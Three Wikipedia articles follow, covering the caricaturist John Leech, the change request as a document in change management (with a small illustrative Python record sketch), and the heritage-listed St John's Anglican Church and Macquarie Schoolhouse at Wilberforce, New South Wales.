https://en.wikipedia.org/wiki/John%20Leech%20%28caricaturist%29
|
John Leech (caricaturist)
|
John Leech (29 August 1817 – 29 October 1864) was a British caricaturist and illustrator. He was best known for his work for Punch, a humorous magazine for a broad middle-class audience, combining verbal and graphic political satire with light social comedy. Leech catered to contemporary prejudices, such as anti-Americanism and antisemitism, and supported acceptable social reforms. His critical yet humorous cartoons on the Crimean War helped shape public attitudes toward heroism, warfare, and Britons' role in the world.
Leech also enjoys fame as the first illustrator of Charles Dickens' 1843 novella A Christmas Carol. He was furthermore a pioneer in comics, creating the recurring character Mr. Briggs and some sequential illustrated gags.
Early life
John Leech was born in London. His father, a native of Ireland, was the landlord of the London Coffee House on Ludgate Hill, "a man", on the testimony of those who knew him, "of fine culture, a profound Shakespearian, and a thorough gentleman." His mother was descended from the family of Richard Bentley. Like his father, Leech was skillful at drawing with a pencil, which he began doing at a very early age. When he was only three, he was discovered by John Flaxman, who was visiting, seated on his mother's knee, drawing with much gravity. The sculptor admired his sketch, adding, "Do not let him be cramped with lessons in drawing; let his genius follow its own bent; he will astonish the world"—advice which was followed. A mail-coach, done when he was six years old, is already full of surprising vigour and variety in its galloping horses. Leech was educated at Charterhouse School, where William Makepeace Thackeray, his lifelong friend, was a fellow pupil, and at sixteen he began to study for the medical profession at St Bartholomew's Hospital, where he won praise for the accuracy and beauty of his anatomical drawings. He was then placed under a Mr Whittle, an eccentric practitioner, the original of "Rawkins" in Albert Smith's Adventures of Mr Ledbury, and afterwards under Dr John Cockle; but gradually he drifted into the artistic profession. His nickname, "Blicky", stayed with him throughout his life.
Artistic career
He was eighteen when his first designs were published, a quarto of four pages, entitled Etchings and Sketchings by A. Pen, Esq., comic character studies from the London streets. Then he drew some political lithographs, did rough sketches for Bell's Life, produced a popular parody on Mulready's postal envelope, and, on the death of Dickens illustrator Robert Seymour in 1836, unsuccessfully submitted his renderings to illustrate the Pickwick Papers.
In 1840 Leech began his contributions to the magazines with a series of etchings in Bentley's Miscellany, where George Cruikshank had published his plates to Jack Sheppard and Oliver Twist, and was illustrating Guy Fawkes in feebler fashion.
In company with the elder master Leech designed for the Ingoldsby Legends and Stanley Thorn, and until 1847 produced many independent series of etchings. These were not his best work; their technique is imperfect and we never feel that they express the artist's individuality, the Richard Savage plates, for instance, being strongly reminiscent of Cruikshank, and The Dance at Stamford Hall of Hablot Browne.
In 1845 Leech illustrated St Giles and St James in Douglas William Jerrold's new Shilling Magazine, with plates more vigorous and accomplished than those in Bentley, but it is in subjects of a somewhat later date, and especially in those lightly etched and meant to be printed with colour, that we see the artist's best powers with the needle and acid.
Among such designs are four charming plates to Charles Dickens's A Christmas Carol (1843), the broadly humorous etchings in the Comic History of England (1847–1848), and the still finer illustrations to the Comic History of Rome (1852)—which last, particularly in its minor woodcuts, shows some exquisitely graceful touches, as witness the fair faces that rise from the surging water in Cloelia and her Companions Escaping from the Etruscan Camp. Among his other etchings are those in Young Master Troublesome or Master Jacky's Holidays, and the frontispiece to Hints on Life, or How to Rise in Society (1845)—a series of minute subjects linked gracefully together by coils of smoke, illustrating the various ranks and conditions of men, one of them—the doctor by his patient's bedside—almost equalling in vivacity and precision the best of Cruikshank's similar scenes.
Then in the 1850s come the numerous etchings of sporting scenes, contributed, together with woodcuts, to the Handley Cross novels by Robert Smith Surtees.
Lithographic work
Leech's lithographic work includes the 1841 Portraits of the Children of the Mobility, an important series dealing with the humorous and pathetic aspects of the London street "Arabs", which were afterwards so often and so effectively to employ the artist's pencil. Amid all the squalor which they depict, they are full of individual beauties in the delicate or touching expression of a face, in the graceful turn of a limb. The book is scarce in its original form, but in 1875 two reproductions of the outline sketches for the designs were published—a lithographic issue of the whole series, and a finer photographic transcript of six of the subjects, which is more valuable than even the finished illustrations of 1841, in which the added light and shade is frequently spotty and ineffective, and the lining itself has not the freedom which we find in some of Leech's other lithographs. That freedom is notable in the Fly Leaves, published at the Punch office, and in the inimitable subject of the nuptial couch of the Caudles, which also appeared, in woodcut form, as a political cartoon, with Mrs Caudle, personated by Brougham, disturbing by untimely loquacity the slumbers of the lord chancellor, whose haggard cheek rests on the woolsack for pillow.
Wood engraving
It was in work for the wood-engravers that Leech was most prolific and individual. Among the earlier of such designs are the illustrations to the Comic English and Latin Grammars (1840), to Written Caricatures (1841), to Hood's Comic Annual, (1842), and to Albert Smith's Wassail Bowl (1843), subjects mainly of a small vignette size, transcribed with the best skill of such woodcutters as Orrin Smith, and not, like the larger and later Punch illustrations, cut at speed by several engravers working at once on the subdivided block.
It was in 1841 that Leech's connection with Punch began, a connection which subsisted until his death, and resulted in the production of the best-known and most admirable of his designs. His first contribution appeared in the issue of 7 August, a full-page illustration entitled Foreign Affairs, of character studies from the neighbourhood of Leicester Square. His cartoons deal at first mainly with social subjects, and are rough and imperfect in execution, but gradually their method gains in power and their subjects become more distinctly political, and by 1849 the artist is strong enough to produce the splendidly humorous national personification which appears in Disraeli Measuring the British Lion. About 1845 we have the first of that long series of half-page and quarter-page pictures of life and manners, executed with a hand as gentle as it was skilful, containing, as Ruskin has said, "admittedly the finest definition and natural history of the classes of our society, the kindest and subtlest analysis of its foibles, the tenderest flattery of its pretty and well-bred ways", which has yet appeared.
In addition to his work for the weekly issue of Punch, Leech contributed largely to the Punch almanacks and pocket-books, to Once a Week between 1859 and 1862, to the Illustrated London News, where some of his largest and best sporting scenes appeared, and to innumerable novels and miscellaneous volumes besides, of which it is only necessary to specify A Little Tour in Ireland (1859). This last piece is noticeable as showing the artist's treatment of pure landscape, though it also contains some of his daintiest figure pieces, like that of the wind-blown girl, standing on the summit of a pedestal, with the swifts darting around her and the breadth of sea beyond.
Public exhibition
In 1862 Leech appealed to the public with a very successful exhibition of some of the most remarkable of his Punch drawings. These were enlarged by a mechanical process, and coloured in oils by the artist himself, with the assistance and under the direction of his friend John Everett Millais. Millais had earlier painted a portrait of a child reading Leech's comic book Mr Briggs' Sporting Tour.
Character
Leech was a rapid and indefatigable worker. Dean Hole said he observed the artist produce three finished drawings on the wood, designed, traced, and rectified, "without much effort as it seemed, between breakfast and dinner". The best technical qualities of Leech's art, his precision and vivacity in the use of the line, are seen most clearly in the first sketches for his woodcuts, and in the more finished drawings made on tracing-paper from these first outlines, before the chiaroscuro was added and the designs were transcribed by the engraver. Turning to the mental qualities of his art, it would be a mistaken criticism which ranked him as a comic draughtsman. Like Hogarth he was a true humorist, a student of human life, though he observed humanity mainly in its whimsical aspects,
Hitting all he saw with shafts
With gentle satire, kin to charity,
That harmed not.
The earnestness and gravity of moral purpose which is so constant a note in the work of Hogarth is indeed far less characteristic of Leech, but there are touches of pathos and of tragedy in such of the Punch designs as the Poor Man's Friend (1845), and General Février turned Traitor (1855), and in The Queen of the Arena in the first volume of Once a Week, which are sufficient to prove that more solemn powers, for which his daily work afforded no scope, lay dormant in their artist.
The purity and manliness of Leech's own character are impressed on his art. We find in it little of the exaggeration and grotesqueness, and none of the fierce political enthusiasm, of which the designs of James Gillray are so full. Compared with that of his great contemporary, George Cruikshank, his work is restricted both in compass of subject and in artistic dexterity.
In popular culture
Leech was played by Simon Callow in the 2017 film The Man Who Invented Christmas which depicts the 1843 writing and production of Dickens' A Christmas Carol.
Death
He died on 29 October 1864 and was buried in Kensal Green Cemetery, close to his friend William Makepeace Thackeray (two graves to the left).
Gallery
References
Biographies of Leech have been written by
John Brown, John Leech, and Other Papers, D. Douglas, 1882 ; HardPress Publishing, 2013
Frederick G. Kitton, John Leech, artist and humorist: a biographical sketch (1883)
William Powell Frith, John Leech: His Life and Work (1891)
Further reading
Houfe, Simon. "Leech, John (1817–1864)", Oxford Dictionary of National Biography (Oxford University Press, 2004); online edn, 2014 Retrieved 13 June 2015
Houfe, Simon. John Leech and the Victorian scene (1984)
Markovits, Stefanie. The Crimean War in the British Imagination (Cambridge University Press, 2009), Chapter on Leech's artwork regarding the Crimean war
Miller, Henry J. "John Leech and the Shaping of the Victorian Cartoon: The Context of Respectability," Victorian Periodicals Review (2009) 42#3 pp 267–291.
Thackeray, William Makepeace. "John Leech's Pictures of Life and Character", Quarterly Review'' No. 191, Dec. 1854, online
External links
The John Leech Punch magazine sketch archives
English illustrators
English caricaturists
English comics artists
Artists from London
1817 births
1864 deaths
Burials at Kensal Green Cemetery
Charles Dickens
Punch (magazine) cartoonists
Alumni of the Medical College of St Bartholomew's Hospital
Artists' Rifles soldiers
People educated at Charterhouse School
|
3919967
|
https://en.wikipedia.org/wiki/Change%20request
|
Change request
|
A change request (aka Change Control Request, or CCR) is a document containing a call for an adjustment of a system; it is of great importance in the change management process.
A change request is declarative, i.e. it states what needs to be accomplished, but leaves out how the change should be carried out. Important elements of a change request are an ID, the customer (ID), the deadline (if applicable), an indication whether the change is required or optional, the change type (often chosen from a domain-specific ontology) and a change abstract, which is a piece of narrative (Keller, 2005).
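A minimal sketch of how the elements listed above might be represented as a record; the class and field names are illustrative only and do not correspond to any standard schema.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional

@dataclass
class ChangeRequest:
    request_id: str
    customer_id: str
    change_type: str             # often chosen from a domain-specific ontology
    abstract: str                # narrative of what needs to be accomplished
    required: bool = True        # False if the change is optional
    deadline: Optional[date] = None

# Hypothetical example
cr = ChangeRequest(
    request_id="CR-1042",
    customer_id="CUST-77",
    change_type="defect",
    abstract="Login page rejects valid passwords containing '+'.",
    deadline=date(2024, 6, 30),
)
```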
Change requests typically originate from one of five sources:
problem reports that identify bugs that must be fixed, which forms the most common source
system enhancement requests from users
events in the development of other systems
changes in underlying structure and or standards (e.g. in software development this could be a new operating system)
demands from senior management (Dennis, Wixom & Tegarden, 2002).
Additionally, in Project Management, change requests may also originate from an unclear understanding of the goals and the objectives of the project.
Change requests have many different names, which essentially describe the same concept:
Request For Change (RFC) by Rajlich (1999); RFC is also a common term in ITIL (Keller, 2005) and PRINCE2 (Onna & Koning, 2003).
Engineering Change (EC) by Huang and Mak (1999);
Engineering Change Request (ECR) at Aero (Helms, 2002);
Engineering Change Order (ECO) by Loch and Terwiesch (1999) and Pikosz and Malmqvist (1998). An Engineering Change Order is a separate step that follows the ECR: once the ECR is approved by the engineering department, an ECO is issued to carry out the change;
Change Notice at Chemical (Helms, 2002);
Action Request (AR) at ABB Robotics AB (Kajko-Mattson, 1999);
Change Request (CR) is, among others, used by Lam (1998), Mäkäräinen (2000), Dennis, et al. (2002), Crnkovic, Asklund and Persson-Dahlqvist (2003) and at ABB Automation Products AB (Kajko-Mattsson, 1999).
Operational Change Request (OCR).
Enterprise Change Request (ECR).
See also
Change management (engineering)
Change control
Change order
Engineering Change Order
References
Further reading
Crnkovic I., Asklund, U. & Persson-Dahlqvist, A. (2003). Implementing and Integrating Product Data Management and Software Configuration Management. London: Artech House.
Dennis, A., Wixom, B.H. & Tegarden, D. (2002). System Analysis & Design: An Object-Oriented Approach with UML. Hoboken, New York: John Wiley & Sons, Inc.
Helms, R.W. (2002). Product Data Management as enabler for Concurrent Engineering. PhD dissertation. Eindhoven: Eindhoven University of Technology press. Available online: http://alexandria.tue.nl/extra2/200211339.pdf.
Huang, G.H. & Mak, K.L. (1999). Current practices of engineering change management in UK manufacturing industries. International Journal of Operations & Production Management, 19(1), 21–37.
Kajko-Mattsson, M. (1999). Maintenance at ABB (II): Change Execution Processes (The State of Practice). Proceedings of the International Conference on Software Maintenance, 307–315.
Keller, A. (2005). Automating the Change Management Process with Electronic Contracts. Proceedings of the 2005 Seventh IEEE International Conference on E-Commerce Technology Workshops, 99-108.
Lam, W. (1998). Change Analysis and Management in a Reuse-Oriented Software Development Setting. In Pernici, B. & Thanos, C. (Eds.) Proceedings of the Tenth International Conference on Advanced Information Systems Engineering, 219–236.
Loch, C.H. & Terwiesch, C. (1999). Accelerating the Process of Engineering Change Orders: Capacity and Congestion Effects. Journal of Product Innovation Management, 16(2), 145–159.
Mäkäräinen, M. (2000). Software change management processes in the development of embedded software. PhD dissertation. Espoo: VTT Publications. Available online: http://www.vtt.fi/inf/pdf/publications/2000/P416.pdf.
Onna, M. van & Koning, A. (2003). The Little Prince 2: A Practical Guide to Project Management, Pink Roccade Educational Services/Ten Hagen Stam.
Pikosz, P. & Malmqvist, J. (1998). A comparative study of engineering change management in three Swedish engineering companies. Proceedings of the DETC98 ASME Design Engineering Technical Conference, 78–85.
Rajlich, V. (1999). Software Change and Evolution. In Pavelka, J., Tel, G. & Bartošek, M. (Eds.), SOFSEM'99, Lecture Notes in Computer Science 1725, 189–202.
DiDonato, P. (2001). Oakley Inc, Developing XML systems with (CRF).
Systems engineering
Business terms
|
58788484
|
https://en.wikipedia.org/wiki/St%20John%27s%20Anglican%20Church%20and%20Macquarie%20Schoolhouse
|
St John's Anglican Church and Macquarie Schoolhouse
|
St John's Anglican Church and Macquarie Schoolhouse is a heritage-listed Anglican church building and church hall located at 43-43a Macquarie Road, Wilberforce, City of Hawkesbury, New South Wales, Australia. The church was designed by Edmund Blacket and built from 1819 to 1859 by James Atkinson, senior; and the schoolhouse was built by John Brabyn. The church is also known as the St. John's (Blacket) Church, while the hall (former schoolhouse) is also known as the Macquarie Schoolhouse/Chapel and the Wilberforce Schoolhouse. It was added to the New South Wales State Heritage Register on 20 August 2010.
History
The Darug (various spellings) occupied the area from Botany Bay to Port Jackson north-west to the Hawkesbury and into the Blue Mountains. The cultural life of the Darug was reflected in the art they left on rock faces. Before 1788, there were probably 5,000 to 8,000 Aboriginal people in the Sydney region. Of these, about 2,000 were probably inland Darug, with about 1,000 living between Parramatta and the Blue Mountains. They lived in bands of about 50 people, and each band hunted over its own territory. The Gommerigal-tongarra lived on both sides of South Creek. The Boorooboorongal lived on the Nepean from Castlereagh to Richmond. Little information was collected about the Aborigines of the Hawkesbury before their removal by white settlement so details of their lifestyle have to be inferred from the practices of other south-eastern Aborigines. It is believed they lived in bark gunyahs. The men hunted game and the women foraged for food.
On 15 December 1810, Macquarie issued an Order laying out five towns along the Hawkesbury River. One at Green Hills would be called Windsor. Another at Richmond Hill District would be called Richmond. A third in the Nelson district would be named Pitt Town. The village in the Phillip district would be called Wilberforce and the fifth in the Evan district was Castlereagh. Nearby settlers would be allotted sites on these towns to build. Reverend Samuel Marsden was instructed by Macquarie on 2 February 1811 to consecrate the burial grounds at the new towns on the Hawkesbury including Wilberforce. Surveyor Evans would show him the areas set aside.
Macquarie Schoolhouse
Macquarie's Instructions from the Colonial Office included not just the establishment of towns but also the creation of schools, a policy with which Macquarie was in complete agreement. His Order of 11 May 1811 strongly recommended to parents and family heads "The Education and Instruction of the Youth of both Sexes being an Object of the utmost Importance, as laying the Foundation of many Advantages to the rising Generations". Macquarie encouraged local residents to fund and establish schools themselves but also assisted with government funds. His Order of 11 May 1811 encouraged the establishment of schoolhouses at the initiative of local communities and promised to contribute A£25 of government money to each schoolhouse. At the same time, he directed that settlers should no longer bury their dead on their farms but in the burial grounds consecrated and measured out "some time since" in places such as Wilberforce.
Schoolhouses were often used for religious purposes until churches were erected near them in the 1850s. These combined schoolhouses, chapels and schoolmaster's residences were a feature of early Macquarie towns on the Hawkesbury. They were built at Castlereagh, Wilberforce, Pitt Town and Richmond often sited in commanding positions with a square nearby.
Reverend Cartwright was paid A£10 before 1 July 1812 for "inclosing the Burial Ground at the Township of Wilberforce". Macquarie's journal noted he visited Wilberforce on 21 May 1813 to mark the site for a new schoolhouse. The Government contributed A£50 towards "Building a Government temporary Chapel and School House, in the Township of Wilberforce" in 1813. On 28 April 1814, he reported that schoolhouses, which would serve as temporary chapels, had already been erected at various places including Wilberforce. It was not a major school. On 20 April 1818 he informed Samuel Marsden that apart from schools in major centres there were also inferior schools at places such as Wilberforce teaching the rudiments of education.
In 1819, a new brick building replaced the earlier temporary one.
Convicted London joiner and carpenter James Gough (1790-1876) who arrived on the Earl Spencer in 1813 and gained his conditional pardon in 1821, won the private contract to build a school at Wilbeforce.
By 30 September 1819, John Brabyn had been paid A£200 for "erecting a School-house and temporary Place of Worship at Wilberforce". On 31 May 1820, D Wentworth paid Brabyn an additional A£85/16/1 for enlarging and completing the School House. This may have funded the skillion at the rear. The skillion addition seems to have been an afterthought to accommodate the schoolmaster but seems to be almost contemporary with the main building as the brick work and fireplace are bonded into the main building. It has been claimed that it was built of sun-dried bricks with stone quoins and was whitewashed with lime to which fat had been added to protect it from the weather. However, in the absence of documentary proof or physical analysis to confirm it this claim cannot be verified. The original roof was of open timberwork with three tie beams. Shutters originally protected the windows. At a later stage, verandahs were added on the western, southern and part of the eastern side.
In September 1821, the Sydney Gazette reported that there were "thriving and ably-conducted Public Schools" at Wilberforce, Pitt Town and Richmond. The Schoolmaster at Wilberforce was William Gow who lived in the lower rooms. The school continued to operate throughout the 1820s. Total enrolments varied between 30 and 40 pupils.
A Government Order in the Sydney Gazette of 1823 states that the annual musters are to be held in the schoolhouse at Wilberforce.
When surveyor Felton Mathew drew his plan of Wilberforce in July 1833, he showed the schoolhouse building as a "Church". A later plan of the town used in the Surveyor-General's Dept included a sketch of this building labelled as "Church & School".
One of the schoolhouse pupils of this period was Fred Ward, born in Windsor in 1835, who later adopted the alias Captain Thunderbolt as the last of the professional bushrangers of NSW.
The schoolhouse was no longer used as a church after the new St John's Church was completed in 1859. The land had not yet been vested in the Church. On 9 August 1858, surveyor Charles S Whitaker transmitted his plan of the allotment in Wilberforce for the Church of England Church, School and Parsonage. The plan showed the new Church along Macquarie Street and the school building at the rear, plus fencing and some topography. On 16 July 1863, an area of 7 acres 2 roods and 15 perches at Wilberforce, part of Section 13, was dedicated to the public for a Church of England Church, School and Parsonage. A formal grant for the school site was not issued until 16 February 1872. An area of 3 acres 1 rood 21 perches was granted to William Bragg, John Henry Fleming and James Rose Buttsworth as trustees of the schoolhouse site (T-shaped parcel of land) under Church of England. On the same day, the church and parsonage sites on either side were also granted.
In 1864, Inspector McCredie reported to the Council of Education that the schoolhouse was much in need of repair. In 1865, he reported it had been repaired for A£80. Varying dates have been given for the closure of the building as a school. One source gives the date as 1874. However, Wilberforce was not on the 1879 list of Denominational Schools closed since 1872. The 1880 list of Anglican Denominational Schools operating listed one at Wilberforce with 42 pupils enrolled. The new Public School opened on 6 July 1880 and the older schoolhouse apparently closed that year. The 1881 list of Anglican Denominational Schools did not include one at Wilberforce. Thereafter, it seems to have been used as a church hall.
When surveyor Charles Robert Scrivener surveyed Wilberforce on 22 August 1894, his plan showed the "Old Church" i.e. schoolhouse and the "New Church". A drawing of the schoolhouse by William Johnson dated about 1900 showed what appeared to be a brick building with a shingle roof, five multi-paned sash windows on the upper floor and four on the lower with central doorway and verandah at front, apparently also shingled. A brick chimney was at the side.
A verandah was added on the western side at an unknown date clad with shingles later replaced by corrugated iron. The exterior was cement rendered in 1911 to arrest the fretting of the brickwork and the skillion was also cement rendered shortly afterwards. A photograph by Kerry & Co dated from 1890 (copied in 1932) showed the roof as shingled. A photograph of 1920 showed the schoolhouse with a shingled roof. Another photograph dated as 1937 showed the roof clad with corrugated iron, suggesting that it was re-roofed in the 1920s or 1930s. The former steep staircase was replaced by one with a gentler grade in 1966. The original shutters have disappeared. A photograph of 1970 in Wymark showed the original multi-paned windows replaced by what appear to be double-hung sash windows. Another photo in Wymark which is not as clear suggests that the windows had been replaced as early as 1920. A fire in 1985 meant much of the roof and interior timberwork was replaced.
A tombstone for John Howorth (died 1804) located on the south side of the Macquarie schoolhouse was moved here in 1960 from the farm near the river south of the village where he was originally buried. It is also included in this listing. It demonstrates burial practices on the Hawkesbury before official cemeteries were established there in Macquarie's period as governor.
St John's Church
At a public meeting on 4 November 1846 called by Reverend T. C. Ewing, public support for building a new church for Wilberforce was sought. The schoolroom used as a place of worship was no longer large enough for the congregation and according to Joshua Vickery "a school-room was not a proper place in which to worship". A committee was formed to erect the new church and a sum of A£100/15/0 was subscribed. If A£300 could be raised they were entitled to government aid. By February 1848, a plan of the proposed church prepared by Edmund Blacket, was available for viewing at the schoolhouse.
A grant of A£450 was approved by the Executive Council of NSW in 1850 to erect the church. Reverend T C Ewing informed the Colonial Secretary on 24 January 1854 that construction of the church had been delayed by the gold rushes. He asked if the funds in support were still available. The builder was James Atkinson. On 13 August 1856, James Atkinson, senior, builder of Windsor advertised for "three or four good Quarrymen and three or four good Masons, to perform the work of a Church". Reverend Frederic Barker, Bishop of Sydney, laid the foundation stone of the new church on 17 December 1856.
After architect Edmund T. Blacket approved the work completed up to 27 April 1857 by J Atkinson amounting in value to A£648, the bulk of funds voted by parliament were transferred to the church. Alexander Dawson, the Colonial Architect, valued the work at A£1,310 on 11 September 1858. The balance of A£20 of the grant was then paid to the church on 17 September 1858.
The Bishop of Sydney consecrated the new church on 12 April 1859 and 29 people were confirmed. The teacher at the school, John Wenban, presented a sundial to the church at its consecration and it remains in place.
A photograph by Kerry & Co dated from 1890 (copied in 1932) showed the church roof as shingled. A photograph of 1920 also showed the church with a shingled roof. The roof was reclad with fibro slates in 1950.
In 1914, the interior and exterior stonework was tuckpointed. An oak Communion Table and Reredos were presented by the parishioners to the church at the centenary of the schoolhouse/chapel. Electric light was installed in St John's Church in 1934. In 1970, three hanging kerosene lamps were still suspended from the ceiling.
The east and west windows (one dated 1878) are memorials to Dunston family members. The Dunston family was one with a long association with the district and church. John Henry Fleming's memorial window commemorates another with a close association with the church.
Description
Macquarie Schoolhouse
The Macquarie School House at Wilberforce is the only surviving example of a small number of school houses which combined a schoolroom and schoolmaster's residence with the schoolroom serving as a church on Sundays.
The school house is a two-storey Colonial Georgian building with a hipped roof and ground floor verandah to the west and south. The verandah roof returns along the east side where it becomes part of a rear skillion. The front facade, facing west, is divided into five bays.
The former schoolhouse is constructed of brick. The bricks to the main building are soft bricks of local red clay. It is not clear whether the bricks were fired or were just sundried. The few bricks in the original part of the building that are visible have lost their outside skin. The bricks to the skillion appear to be of a different clay, suggesting that the skillion was a slightly later addition. Render on the external walls and plaster on the internal walls makes it difficult to assess these bricks in detail.
The roof is sheeted in galvanised steel with close eaves and the walls are rendered with ashlar coursing. The render dates from about 1911. Sandstone quoins are on the corners of the front (west) elevation. There are two corbelled brick chimneys, one on the north side and one on the east. Both chimneys are expressed on the external face of the wall.
The framing to the verandah is not original. When the verandah was replaced, the verandah roofline was also altered at the southeast corner. The skillion meets the wall of the main building at a higher level than the verandah. Early photos show the roof of the skillion continuing across the full length of the east side. The verandah roof now returns around the southeast corner to meet the south wall of the skillion.
Windows to the ground floor are nine over six pane double hung sashes to the original part of the building. The skillion has windows with six over six pane double-hung sashes. Windows to the first floor are six over six pane double-hung sashes and are unusual in having a deep timber frame at the head. All the windows in the main part of the building have timber lintels. Those in the skillion have low brick arches. The doors are ledged and sheeted with beaded boards. The front door retains its original gudgeon pins and iron brackets for the internal security rail. It is in an arched opening with a rendered panel above the transom.
A series of plaques on the south wall of the building record the construction and development of the building and commemorate a number of the schoolmasters who served at the school.
Internally, the building has a simple layout. The ground floor of the main part of the building has two rooms and a stair hall. The skillion also has two rooms connected by a very low door. The first floor is a single large room. A later six panelled door connects the north room of the main building to the north room of the skillion. The walls of the ground floor rooms are plastered. Ceilings in the ground floor of the main part of the building are sheeted and battened, ceilings in the skillion are ripple iron. The first floor has exposed roof framing. Three heavy timber tie beams that appear to be original survive. The main roof framing and boards above were replaced after the 1985 fire. The fireplace at the north end of the first floor retains some elements of the original timber chimneypiece.
A headstone for John Howorth (died 1804), now located next to the schoolhouse, is included in the listing. It was moved in the 1960s from its original location on a Hawkesbury farm where he was buried. It dates from the period before the establishment of the burial ground at Wilberforce, when the dead were buried on their farms. It is believed to be the oldest known tombstone from the Hawkesbury region.
The site contains a significant view corridor from the verandah of the Schoolhouse to the Wilberforce Cemetery.
St John's Church
St John's Anglican Church is a Victorian Academic Gothic style church set at an angle to the street to enable the church to face east. The church is a simple gabled building of four bays, with a gabled chancel at the east end, a gabled porch on the south side and a gabled vestry on the north side of the chancel.
The church has a steeply pitched roof of compressed cement sheet shingles, replacing the original timber shingles. Modern colorbond barge flashings have replaced the original exposed ends of the shingles and battens. The roof steps down at the east end to mark the narrowing of the church for the chancel.
The body of the walls of the church are of pointed sandstone, with smooth-faced stone around the narrow pointed arched windows. The walls have been repointed in cementious mortar. At the west end is an elegant belfry, still with its bell.
The windows are framed in metal and have diamond pattern leadlight to the top and bottom sashes. The central sash is a pivot sash. Taller stained glass windows are at the east and west ends. The doors are framed and sheeted in pointed-arched openings. Moulded timber battens have been applied to the external face of the doors to emphasise the appearance of vertical joints. A simple iron handrail is on the side of the southern entry porch.
An important feature on the north wall is the original sundial, still marking the time with accuracy. It is painted with the hours of the day in Roman numerals, the date 1859 and the initials of its creator John Wenban.
Internally, the church retains its original sandstone walls, although these have been painted in the vestry. It is not known whether the exposed cedar hammerbeam roof trusses and timber boarding are original fabric. The internal fixtures and fittings are largely non-original fabric. These include: the cedar pulpit, dado and altar rail in the chancel: the gothic style cedar altar; the iron cord cleats fixed to cedar roses on the windows, and brass hooks holding iron brackets for candles that are fixed to the cedar roses. An oak Communion Table and Reredos date from 1920.
Around the walls of the church are a variety of memorial tablets commemorating notable local citizens, former ministers and those lost in war as well as tablets marking commemorative events.
The two light East window is a memorial to Elizabeth Dunston who died in 1899 and her husband John Dunston who had died in 1876. Another window in the nave is in memory of John Fleming, who died in 1894. The West end windows are in memory of John Thomas Dunstan, who died in 1878. The manufacturer is not known.
St John's Church
St John's Church is substantially intact in its form, setting and external appearance apart from the replacement of the original timber shingle roof with cement sheet shingles. Much of the internal detail and fittings is also intact. Some sandstone blocks have weathered more quickly than others but most are in excellent condition. Some of the joints on the keystones over the northern and southern entry porches have cracked but apart from a small crack where the southern wall joins the south-east buttress, the rest of the joints appear to be in fine condition. A few asbestos slates on the roof are slipping. Overall, the church appears to be in excellent condition.
As the location of the original temporary schoolhouse/chapel, one of the earliest known buildings in Wilberforce, which pre-dates the current 1819 Macquarie schoolhouse/chapel, this site has archaeological potential. Since the location of the original school/chapel building is not known, potentially the whole site is involved.
Although modified over the years and repaired after fire damage, the Macquarie Schoolhouse still retains its original form and fenestration. Some of the internal joinery, notably the roof tie-beams, and the hardware on some doors still survives. In view of its age, the Schoolhouse has a high degree of original fabric. St John's Church is intact in its form and setting apart from the replacement of the original timber shingle roof with cement sheet shingles. Much of the internal detail and fittings are non-original fabric.
Modifications and dates
Former Macquarie Schoolhouse/Chapel:
External render c. 1911
Internal stair 1920s, 1966 and 1980s
Shingle roof replaced with corrugated iron possibly 1920s or 1930s
Corrugated steel roof c. 1985
New roof framing c. 1985 (three original tie beams retained)
The first floor windows were replaced after a fire in 1985.
Alteration to junction of verandah and skillion roof c. 1985?
Concrete slab to ground floor.
St John's (Blacket) Church:
Roof replaced with compressed cement sheet shingles, 1950.
Colorbond barge flashings
Cement pointing internally and externally 1914
Oak Communion Table and Reredos added 1920
Painting of walls in vestry
Heritage listing
Wilberforce Schoolhouse was erected to meet the desire of Governor Lachlan Macquarie to promote education and religion at the core of towns he laid out on the Hawkesbury. His scheme of establishing a school, church and burial ground at an elevated and/or central position was completely realised at Wilberforce during his governorship. He chose the sites of the town, church and burial ground personally. His creation of these towns in 1810 was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy into their lifestyles. The establishment of the Schoolhouse demonstrated the importance Governor Macquarie attached to educating the children of the emancipated convicts of the Hawkesbury who constituted the rising generation of colonial freeborn.
Of all the church/school/cemetery centres established in the four towns where this combination was established (i.e. Castlereagh, Pitt Town, Wilberforce and Richmond) the combination at Wilberforce is the one which is mostly intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town. By laying out the village, selecting the site of the square, church and cemetery, plus promoting the construction of the schoolhouse-cum-chapel, Governor Lachlan Macquarie left his personal signature on the village of Wilberforce. The curtilage includes the significant view corridor from the verandah of the Schoolhouse to Wilberforce Cemetery. The church of St John completed in 1859 to the design of architect Edmund T Blacket added an additional element which secured the continued use of this site for its original purpose by enabling the congregation to continue meeting in a building which could accommodate them all. St John's Anglican Church is a fine example of a simple rural church in the Victorian Gothic style by the esteemed nineteenth-century architect Edmund Blacket. Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. Designed in 1847 and erected between 1857 and 1859, St John's Church at Wilberforce is intact in its form and setting and a fine example of Blacket's early, small rural churches.
The church has a rare example of a vertical sundial in Australia, the work of the former schoolmaster, John Wenban.
St John's Anglican Church and Macquarie Schoolhouse was listed on the New South Wales State Heritage Register on 20 August 2010 having satisfied the following criteria.
The place is important in demonstrating the course, or pattern, of cultural or natural history in New South Wales.
It meets this criterion of State significance because the Wilberforce Schoolhouse was erected to meet the desire of Governor Lachlan Macquarie to promote education and religion at the core of the towns he laid out on the Hawkesbury. His scheme of establishing a school, church and burial ground at an elevated and/or central position was fully realised at Wilberforce during his governorship.
He chose the sites of the town, church and burial ground personally. His creation of these towns on the Hawkesbury in 1810 was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy and education of the young into their lifestyles. The establishment of the Schoolhouse demonstrated the importance Governor Macquarie attached to educating the children of the emancipated convicts of the Hawkesbury who constituted the rising generation of colonial freeborn.
Of all the church/school/cemetery centres established in these towns, Wilberforce is the one which is most intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town.
The Schoolhouse is also significant as the location of the annual muster from 1823.
The site includes the significant view corridor from the verandah of the Schoolhouse to the Wilberforce Cemetery.
The church of St John completed in 1859 to the design of architect Edmund T Blacket added an additional element which secured the continued use of this site for its original purpose by enabling the congregation to continue meeting in a building which could accommodate them all.
The place has a strong or special association with a person, or group of persons, of importance in the cultural or natural history of New South Wales.
It meets this criterion of State significance because the Wilberforce Schoolhouse and its site have a close association with Governor Lachlan Macquarie.
